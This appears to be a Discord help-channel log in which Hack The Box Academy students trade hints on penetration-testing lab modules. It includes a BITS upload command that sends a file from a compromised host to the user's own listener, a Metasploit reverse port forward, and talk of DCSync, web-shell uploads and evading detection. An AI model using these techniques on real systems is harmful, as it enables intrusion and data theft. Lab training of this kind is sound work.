There's a lot of common questions that I'm just like, "welp my notes literally don't exist, and I was able to answer it a couple weeks after I did it from memory, but it's been too long now"
^
It makes me take 3 times as long as the time on the module, but hey - I suppose it's good practice
Hi
"oh yeah for this remote protocol I need to add a semicolon after everything"
Yeah but the alternative is you get people who don't take notes then take literal weeks on the assessment. Good notes save time overall.
I'm new to this, Hack The Box
But could someone help me with a problem with a tier1 machine?
wdym tier 1 machine
this is for academy content, if it's not module related, ask a more relevant channel. Verify your account if you can't see em
Ok I'll see there then, thanks!
I'm working my way through File Transfers: Miscellaneous File Transfer Methods.
In the PowerShell Session File Transfer section. Is the computer DC01 a compromised machine, and DATABASE01 another machine that we are trying to transfer files to?
Password Attacks in Pass the Ticket from Linux, here is an image of my setup. What am I missing? I am getting connection refused. I have verified that NfdDml is the right one, but converting it and running it on the Windows machine.
nevermind I got it, had to remove the proxychain that was already in there
I have a question. I am doing the "getting started" module, and the question is
"Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on. "
If I do the nmap -p- "ip" scan, it shows an error of "Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn"
But if I do a -Pn with it the scan just seems to go on to infinity.
Is there a realistic command that I could do
it's not going on to infinity, it's just taking a long time
( waiting for 30minutes now )
you can drop -p- and let it default scan the top most common ports, can feed it timing flags like -T5 to speed it up, or add verbose output -v so you can see it is indeed doing stuff
You should also try manually pinging the target to make sure it's up and reachable
You could always try a --top-ports 1000
I know it's reachable, since I was able to -p8080 for the previous question, and it turned out the result ( also did the ping 😛 )
then yeah more patience or any of the other flag options I suggested
Are you sure the target machine hasn't run out of time?
that too
I just checked that too, and if I do any single use ports it scans in 3 sec
often for actual boxes I'll do a lighter initial scan and then do a full scan in the background while I'm investigating other stuff cause yeah a -p- is going to take a while.
On a live across the internet box a -p- scan can be a couple hours or more
I just came here, since it felt like a long time to do the question for such a rudimentary question
Yeah, tbh I don't remember it taking that long - it would have stuck out I'm sure. Which section are you in in that module, I'll have a look.
see if it does the same for me
Pentesting Basics - Service Scanning
Some machines for me have been a bit slow today
But regardless thank you madfox, 4st1nus and moondark for all the information (figured it's stupid to @ ping for a thank you)
as long as you don't dm without asking I don't care lol
also if you're gonna stick around the server you should probably verify your account #welcome
So many random DM's I don't even answer that many questions lol
it's just guaranteed ignore
done!
So I've had a look and you don't need to do a full scan with -p-
just a normal scan will give you the answer
look for unusually high numbers.
or run a normal scan with -sV
Did you have to do the -Pn ?
I did it like 6 times, but after an hour on this question, I felt asking in modules was my only hope
So when you do nmap <IP> it says that the target might be down?
also are you on the pwnbox or in vpn
I am on pwnbox
hmm usually connection is better in pwnbox
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
are you 100% sure you're typing the right IP?
like I said I answered the previous question and when I do the -v like madf0x suggested, I do see the progress
but if you've reset your machine, you might just be pinging someone else's now.
run nmap on this:
fuck me
Yeah, I think you were typing the wrong IP or something.
Well done! Delete your spoiler though.
I dont see a spoiler
Well, thank you for your help boys
i removed it
gotcha
I've done that
lol me too. For ages, that's why I was sure that was the issue. Past pain.
Password Attacks - Pass the Ticket (PtP) from Linux
Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
This one has stumped me, I thought I found another ticket after running linikatz with root on MS01. It was bi3e6S, but when I go to convert it I get errors. If someone can give me a nudge for the flag.
Remember that LINUX01$ is the machine account. The section talks about impersonating the machine account
Thanks when I get back to my computer I’ll read up on that a bit more
Happy New Year all. I'm stuck on the hard Lab Footprinting. I managed to get the version of SNMP
can anyone provide a tip please
I've spent a couple of days enumerating the services
Did you enumerate the snmp service?
can anyone help with the "password Attacks" module?
lesson learned on trying to just do the AD module... skills assessment been kicking my ass for a bit now lol
it's one of the most challenging modules in the whole course
the second assessment took me 8 hours
AD In general is very very challenging
I got around halfway through the Offshore pro lab and realized I needed some more time with AD, so I just decided to jump into this one
ok, I am on the password reuse/Defaults module. It says to gain the credentials for mysql but I saw the conf file and the only ip for it is in the target pc so I can't use brute force attacks. It's also a loopback address host. The user is mysql. I just need to find a way to get around root to manipulate the conf file to open the port up
You are grossly off base with what you need to do
ok, so I'm running into another issue with the pivoting module. This time on the meterpreter section. Again I'm trying to get a meterpreter session from the internal Windows host. I can see the connection come through if I set up a nc listener on the ubuntu host. However, I'm not getting a callback on my attack machine. Even using netcat, nothing comes through. Any ideas why? This is my reverse port forward command: portfwd add -R -l 8081 -p 8443 -L 10.10.14.67
the module is about password reuse and default creds, messing with config files is entirely out of scope
your image literally has a connection coming in?
That's on the ubuntu machine
sorry
should have clarified
I get nothing on my attack machine
sure you got all your payload settings correct?
I'm double checking now, but I'm 99% sure I did everything correctly
tbh I don't like metasploit port forward at all and basically drained most of my knowledge about it immediately after I didn't need it anymore
Yea, I'm not such a fan either. Just curious as to why it's not working
Question regarding Windows Fundamentals Skills Assessment. Could anyone guide me on how to create a new security group? I can't remember that being taught in the module
Alright. I give up with metasploit port forwarding lmao.
I see, but the port to mysql is closed. How am I supposed to test creds if it is closed?
iirc you should have ssh creds from the previous exercise.
I do, I tested both. None worked.
yeah you're supposed to login with the previous creds then try to find the mysql creds
I get stopped for not having root permissions
They aren't mysql creds lol. You need to ssh to the machine to access mysql
what were you trying to run that gave you root perm error?
I do ssh in, that is the only way to test them as I stated the only access is a local host
its the only access you need
the mysql client from localhost can access the server just fine
Now all you need to do is read the section. What you need to do is explained in the section very very clearly
the port is only closed externally
Think about the name of the section
I ssh into the target pc then try to access mysql from inside with the creds from the previous section. It did not work
no no
you ssh with creds from the previous section then you try to figure out the mysql creds
Again, think about the name of the section
Everything you need is given to you in the section
yea. use mysql as the user and then use the old passwords with it
You're completely glossing over half of the section title
who said mysql was the user?
it's in the conf file
and who said it was old password for the password?
Bro forget about the conf
thats for the server user, not the db user
Just think about the title of the section. That's it. Telling you anything more than that is borderline giving you the answer
the mysql server runs as the mysql user for its process. It has its own authentication for the actual database stuff. That's what you're trying to get into.
another way to look at it, reusing the creds for ssh already satisfies the password reuse half of the section.
thanks. I've been looking at the screen for more than an hour without any ideas. But after reading your comment I've finished it within 5 min
I used both creds from within the target machine.
@low mica hey don't take this the wrong way here but I need you to do a couple of very specific steps okay?
ok
Are you with me?
yes
Password Reuse/Default Password
sam
I believe the issue with it is a bandwidth one. There's not enough bandwidth on the VPN for it to work. I was only ever able to get it to work from Pwnbox
password reuse
Ah. I see.
Okay good
so password reuse checked off
so what part of the section name do you think needs to be used for the next part of the question?
default password?
Good good
now, where in the module do they mention a tool for checking default passwords?
default creds sheet
thanks my guy
so after getting the admin ntlm hash and verifying that auth works on the DC, I'm a bit stumped on the ideal next move
np
don't know what question/module you're on but getting admin hash to DC and authing is usually gg you win right there
NTDS.dit is always juicy
@thorn urchin it's the skills assessment so I know I'm looking for the flag which I feel like I can get with what I have
but bigger picture, not sure what the next real world move would be
rdp to the machine, or some sort of shell?
That would depend on your goal, and whether you're trying to avoid being caught.
Is anyone available to help me with creating a security group? Everywhere I look it says to do it through Active Directory but I cannot access that through the workstation
admin on domain controller is basically endgame unless you've got multiple forests or you got in on day 2 of a two week assessment
but generally you'd opt for some form of shell on the DC
so I did a dcsync to get the hash I'm using, would you gain anything new by doing dcsync again using the admin ntlm hash?
no
you'd DCsync if you had gotten the admin hash some other way and wanted to dump all the users' hashes
it's completed. I found it. Greatly appreciate it
gratz
Remember, very rarely do you have to reach outside of exactly what the section says to do. Assessments are more likely to demand some creativity, but if you're trying something totally outside the section's content you're probably on the wrong path unless you really know what you're doing (using ffuf to make the inclusion module easier for example)
even in those scenarios it should be, "I know exactly what it intends, but I have a better way"
yea I went far right for sure lol. I'm starting to see that it's easy to overthink these modules
seems pretty accurate, this whole skills assessment is much easier using a pivot... wish I had done that whole module first
Yeah using pivots has been my number 1 recommendation for people doing the AD assessment
it led me into a minor trap that took a little thinking to get out of, but other than that it made the rest of my life easier
They don't tell you to use pivots in the AD section?!?
How tf do you do AD without pivoting 😆
Nope, but it's after the pivoting module in the course
Any help with creating a security group?
you're supposed to be able to connect the two pieces of knowledge together on your own.
fair point
sorry not ignoring you, I just haven't done that module and don't know at all.
presume same goes for others in chat right now
I can't find anything on how to create a security group in the module either and this is a beginner module
most of the individual sections are already configured and it seems pretty self contained using the existing tools, but the skills assessment is a different beast
yeah cause the assessment gives you a realistic foothold and says good luck
I had the wrong impression about the modules though, I assumed they were built mostly as stand-alone elements
Some are
if I had known that, I would've approached it differently
since I was just looking for an AD-specific track to brush up while doing Offshore
I mean it's definitely entirely doable without it, it's just a lot harder if you don't know pivots at all
and adding pivots to the module would be a bit out of scope
Yea that's a fair point
I've done some pivoting before, but it definitely caught me unprepared here. Was already using the pivoting in Offshore
but the SA definitely was easier by just doing what was needed lol
without the pivot, I was trying to use enter-pssession... and that was just janky
Personally I also just prefer dropping a minimal amount of tools on the target, and you auto-bypass AV and EDR if you stick with network tools where you can, so I did the majority of the lab using the Linux options wherever reasonable to do so. That'd have been absolutely impossible without pivoting.
there was just one moment where the linux analog for a certain tool returned mostly the same information but crucially not the piece I needed.
skills assessment pt 1... finally lol
oh that was the pt 1 you were on lol
get ready, pt 1 was the warm up, pt 2 is the ride
pt 1 was like two or three hours for me, pt 2 was a full 8 hours, just for context. Your mileage will obv vary
yes I did and it's v3
Ok I think I found the cmdlet to add a security group but powershell is not recognizing it
tried to use braa with no go
did you find the community string first
Ok I'm fairly confident I found the cmdlet to make the security group but Powershell won't recognize, anyone got any ideas?
either you're making an assumption here or I'm severely misremembering that lab
the lab has 6 ports open: imap, pop3, ssh and udp 161
snmp is v3 and I'm unable to find anything using braa. snmpwalk is only for 1 and 2c
well I don't have time to double check that lab right now, so unfortunately good luck
hard lab right? I may be able to double check it later after dinner plans
if anyone can throw me a hint I would appreciate it. Thanks for responding @thorn urchin
🖖
What is broken about it?
target machine unreachable
Are you connected to VPN?
yes...
Have you tried resetting the machine?
I've tried spawning machines from other modules and have had no issues connecting to those. I've had the same issue for a few days with only windows privesc
yes...
And you've tried connecting to it using the methods provided?
are you able to connect to the machine?
windows privilege escalation skills assessment I
I'm busy working rn gimme an hour to see unless someone else that's done windows priv-esc can give you more info
Remember that windows by default has a firewall turned on and thus will not respond to pings
^
You'll run into many things where just pinging will get you dead in the water
Some of the modules, or sections, nmap won't get you anywhere because it's a webpage requiring website enumeration
🤮
thank you
It's never a good idea to blindly rely on ping for host discovery. 99% of firewalls will drop ICMP packets
If you know a machine is up but it isn't responding always use the -Pn nmap flag (It disables ping host discovery)
I'm familiar with the flag. Never come across a scenario where it was needed in 3+ years of hack the box though. Definitely some valuable real world advice and I appreciate that
thanks again
Np
Hello, please can someone explain why this code doesn't work
#!/bin/bash
arr=(1 2 3 4 5)
for i in $arr
do
echo $i
done
it just prints 1
$arr will not expand the array
you need to use something more like "${arr[@]}"
After joining a machine, how do we know what to do in HTB?
well if you're doing a module from http://academy.hackthebox.com then whatever the module is teaching you to get the question asked; if you're doing a box from http://www.hackthebox.com then your question is going to be better in #boxes; I recommend starting with the Starting Point/Getting Started sections
I want to solve problems only
Well if you want to know what to do; you can always look up how to get into the system or get the information you are looking for. But if you do not know how to start; then it's kinda hard to help you
But if you're just looking to answer questions on the academy side without actually reading the module then you're not really learning
can anyone give me a hint for the Footprinting - Hard Lab
as the modules mostly walk you through
may I dm to know where you're at on the footprint - hard to avoid spoiler?
sure
hi
Another question about the pivoting module 😅 :
In the section "SSH for Windows: plink.exe" you are encouraged to boot up a Windows attack box and use plink to establish a dynamic port forward. Problem is, I'm getting the shown error when trying to connect to the target. Anyone know how to fix it? I've tried updating to the newest version of putty, I've tried newer plink.exe binaries, I've tried old ones. Nothing seems to work. Before anyone asks, yes I'm connected to the vpn. I can ping the target as shown
Think you might need to modify your openvpn configuration file on the windows host
Hmm. I didn't think of that. I'll give it a try
something to do with the encryption of your host and target not agreeing on a protocol
Yea, I assumed it was to do with ssh
might be an option in the ovpn configuration file where you can choose an encryption, might try to force it to only use 1 kind of encryption. Probably older weaker encryption might make it successful
nope. Not a vpn thing
it's an issue with putty
research has confirmed lol
what's wrong with it?
I have no idea lol
that's the problem
Everything i can find just says update putty to the latest version, but my putty is already updated
I mean if it's issues with the programming then might just move on unless you want to delve into the source code and fix it and recompile it lol
lmao. Nah I'm good
was just hoping someone would show up with some voodoo magic to get it working lol
use linux :^)
there's the voodoo 
Lmao. For most things I do. But I do want to know how to do it from a Windows machine
I've run into issues with the Linux kernel causing bugs and kernel programming way freaking beyond me lol. Then you just try to find workarounds
Nah I know that Tux is attempting to do it the way nature intended
because it insinuates using a windows host
If you're trying to evade detection, connecting from a Linux machine in a primarily Windows environment will get you caught almost instantly
I'm just tryna learn as much as I can lol
imagine learning
You never know. One day you'll be doing an assessment and you'll need to create a dynamic port forward from a Windows machine. Then you'll wish you figured this issue out lol
not necessarily. It's all just data and packets going across a network. A lot of Linux tools mimic the data just as if it's coming from a Windows host
That's 110% not true lol
It's very easy to tell the difference between a Windows and Linux machine from a defense perspective
^ I forget how it's done usually it's through the default ping requests that happen prior to an attack that blanket check for ports
can you modify TTL; yes
you can change the TTL tho
if you're just looking at network packets they can be spoofed unless the defender can reach the attacker's actual machine with a scan of some kind.
but USUALLY most people don't
but there are other ways of differentiating between windows and linux machines
especially if you have admin access to the domain lol
sips idk much about blue team side stuff
I don't either. I just know it can be done
I've never really delved into blue team stuff but this is one example of a time when it would be really good to know some blue stuff
I think really to be effective at pentest/red team, you should at least know how blue team detects you
i.e. firewall rules and stuff like that
Yea
Of course
but the more you know the better
Best way to avoid being detected is to know how people try to detect you
even if it's basics like, usually port 53 is used as a zone transfer and is trusted by internal networks
And i wanna work my way up to red teaming eventually so this is all stuff i gotta know
well yea of course
Same thing with 80 and 443
although using port 80 can set off flags sometimes
that's why it's usually proxied as 8080, yeah?
i forget what 443 often is proxied as
8443
ah yeah
very creative lol
APTs (advanced persistent threats) like intel and nation state cyber warfare commands. They usually will create custom tools and software from scratch tailored to the computers and network they're trying to target. Custom designed to get around their particular defenses and software configurations.
I know most of my basic networking ports though because I have an actual net+ cert
yes i know
and you know what it comes in handy
nice
I JUST THOUGHT of something that can help me with my lab notes in obsidian; create a common port checklist; then delete the ones that aren't scanned
Could be useful lol
sounds tedious but whatever works for you
(we're getting grossly off topic here btw)
anyway about that module that does the thing
lmao
but no redoing my notes is giving me a decent refresher (I'm definitely not procrastinating moving forward, nope, no sir, not me)
I would still like an answer to my plink.exe issue if anyone has one
lmao
I always do that. And then I start the next module and I'm like "This is awesome, I'm learning so much, why didn't I start this sooner??"
I didn't do the plink part
ah rip. Well, i posted it in #1024429874246590575 hopefully someone comes along and can figure it out
I tried and failed like him and just moved on since they kinda just wanted you to try it out and not actually try and get a flag.
or I did and I blanked it from memory entirely
I don't like leaving the answer as "it didn't work". I always want to know why it didn't work and how to fix the problem. That's just how I am
But i am sufficiently stumped here
looking it up seems like an old version issue
I've tried almost every version at this point
so maybe either using a too old or too new version for the target
either way not possible because it just wasn't intended
So I'm trying to practice some of the file transfer methods from the compromised machine (Windows) to my Linux machine. Docs state to run nc -lvnp 5000 which I have done. On the Windows box I'm running the following:
Start-BitsTransfer -Source "C:\Users\htb-student\test_file.txt" -Destination "http://<my-ip>:5000" -TransferType Upload
I see the request hit my box but no data from the file comes through, just the headers
also from the BITS protocol docs it's not entirely clear how it is sending the binary data, whether in the http body or wtf it is: https://learn.microsoft.com/en-us/windows/win32/bits/bits-upload-protocol
also.... I ||fucking ||hate windows
oh, I wonder if it fails 'cause it's waiting for a response: https://learn.microsoft.com/en-us/windows/win32/bits/create-session
to Ack before sending the file
I wrote a little python flask app to accept the weird BITS_POST method but flask comes back as nothing sent via the http body, and Windows box says a thing about a bad response from the server
okay... good talk 🤣
Hi, I'm on Introduction to Networking and I can't solve this question. My understanding is lacking here after spending 3 hours on it and using ChatGPT as well.
It says I need to split CIDR 10.200.20.0/27 into 4 subnets and give the 3rd then the 2nd network addresses as the answers. Is anyone able to point out the gap in my understanding for this? If this is the wrong place to ask please ignore
might help you https://www.subnet-calculator.com/
me too and killgates
always find python http server a very reliable method. My favorite is the base64 method if the file is small enough, as it technically doesn't require any network connection. Just need to be able to copy, paste and decode
Thanks CHAD I’m gonna try this out, I haven’t felt so entertained by learning something new in a long time
a Linux tool called sipcalc is also useful and can run in a terminal
Guys did anyone manage to finish the "Whitelist Filters" section off of File Upload Attacks? DM would be greatly appreciated!
Help pl0x
can anyone help me with the
Vuln assessment > Nessus Skills Assessment?
I don't know how to get the pre-scanned output and the web interface they talked about seems dead
I'm stuck at Password Attacks Lab - Hard. I have found the password of user D**** but it isn't possible to RDP in. Also not possible to change user. Does anyone have a hint for me?
Sure. DM me if you still need help
I am having the exact same issue with both xfreerdp and rdesktop: black screen. Have you found a solution?
I think someone said you could hit enter a few times to get the black screen to go away in xfreerdp
alternatively you could use Remmina
anyone got a second? Is the IP range supposed to match the Active Directory Enumeration & Attacks "Identifying Hosts" in Wireshark? You're asked to RDP to the target but the IP ranges are not the same when using the VPN connection and I get no ARP requests per this section -
That image is from the module. =
```
Identifying Hosts
First, let's take some time to listen to the network and see what's going on. We can use Wireshark and TCPDump to "put our ear to the wire" and see what hosts and types of network traffic we can capture. This is particularly helpful if the assessment approach is "black box." We notice some ARP requests and replies, MDNS, and other basic layer two packets (since we are on a switched network, we are limited to the current broadcast domain) some of which we can see below. This is a great start that gives us a few bits of information about the customer's network setup.
Scroll to the bottom, spawn the target, connect to the Linux attack host using xfreerdp and fire up Wireshark to begin capturing traffic.
Wireshark Output
```
Perfect, thanks
Should I use my workstation (pwnbox) for these modules instead of my kali VM connected to the vpn?
You can use both. I prefer VM though
which section are you on?
Can anyone tell me where to get help regarding Dante Lab
👀
Thank you, I figured it out. I have to RDP into attack machine and use wireshark on that machine to see the arp responses. Using Remmina is not ideal resolution wise.
Working on file uploads and walking through the example. Client-Side Validation. It shows that if I remove "checkFile" and "accept=<blahblah>" I should be able to upload. I keep getting a "bad extension" and unsure of why or how.
and @night pier -- If still stuck on this, DM me
To do so, we can go back to our inspector, click on the profile image again, double-click on the function name (checkFile) on line 18, and delete it:
Tip: You may also do the same to remove accept=".jpg,.jpeg,.png", which should make selecting the PHP shell easier in the file selection dialog, though this is not mandatory, as mentioned earlier.
With the checkFile function removed from the file input, we should be able to select our PHP web shell through the file selection dialog and upload it normally with no validations, similar to what we did in the previous section.
I just feel incredibly stupid trying to follow along with this....this is extremely easy. Follow the steps....and I'm still getting extension blocks even though they've been removed client side
~~Need some help for Introduction to Active Directory - AD Administration: Guided Lab Part I, task 3.
I did everything along the lesson, created the users, the OU and the group, then added them to the OU and group.
||Add-ADGroupMember -Identity "Security Analysts" -Members ACepheus,OStarchaser,ACallisto|| works without errors.
Then I run ||Copy-GPO -SourceName "Logon Banner" -TargetName "Security Analysts Control"||, which again works, and running it again shows it was created: Copy-GPO : The command cannot be completed because a "Security Analysts Control" GPO already exists in the INLANEFREIGHT.LOCAL domain.
But, when I try to link it to the Group with ||Set-GPLink -Name "Security Analysts Control" -Target "ou=Security Analysts,ou=IT,OU=HQ-NYC,OU=Employees,OU=Corp,dc=INLANEFREIGHT,dc=LOCAL" -LinkEnabled Yes|| it errors out:
Set-GPLink : There is no GPO named "Security Analysts Control" in the INLANEFREIGHT.LOCAL domain that is linked to the
Active Directory container with LDAP path "OU=Security
Analysts,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL". Make sure that a GPLink exists for the GPO
specified by the GUID parameter and the site, organizational unit (OU), or domain specified by the Path parameter.
Then, run the command again.~~
Edit: solved, thanks to viktus' post in #858470491676737536. The command to create the link is ||New-GPLink||, not ||Set-GPLink||.
Hello all,
I'm working on the Password Attacks Module Lab Hard, and for hours I've been trying to crack the file you get after initial access. Tried with the provided wordlist, tried with mutations of both users and pass files, tried mutations of the enumerated users as well, but nothing works. Any hints would be appreciated
Thank you
i heard previously that it takes 20-30 minutes to crack it
so maybe need a bigger list 🤷?
Not sure what wordlist to use cause I'm running in circles here
Dm me
you try rockyou? iirc there was a couple points here and there where you needed that list instead.
anyone around that has completed the File Upload Skills Assessment and willing to have a quick chat?
I actually did to no avail
hello, I am on preignition and I am on task six and it's asking "When using gobuster to dir bust, what switch do we add to make sure it finds PHP pages?" so I go to gobuster -h and I can't find the answer. I hate asking for help but I have been on this for 30 minutes trying to figure it out
Hi Folks, AD Enumeration & Attacks - Skills Assessment Part I - stuck on question that requires accessing the MS01 machine as an admin, would appreciate any hint on this one 🙂
Thank you Bro, we got it 🙂
That's pretty abnormal, the vast majority of people aren't having such issues
hello, I am on preignition and I am on task six and it's asking "When using gobuster to dir bust, what switch do we add to make sure it finds PHP pages?" so I go to gobuster -h and I can't find the answer. I hate asking for help but I have been on this for 30 minutes trying to figure it out. I know this isn't the right channel but like no one is telling me how to verify my account
Are you running pwnbox and vpn at the same time by any chance?
To this day you're the only one who I've ever seen having these issues
That's not to discount your frustration, I get it. But it's likely being caused by your setup somewhere and not HTB
If you use both at the same time it'll mess with things
and you'll get dropped connections
-x allows you to specify extensions to search for
thank you !
oh I was doing gobuster -h
ah. Gobuster is broken up into modules. If you want help with a specific module you need to specify that in the command
oh okay, thank you. I went from mechanical engineer to cyber security because it seemed more fun, but I am realizing now I am not as smart as I thought I was lol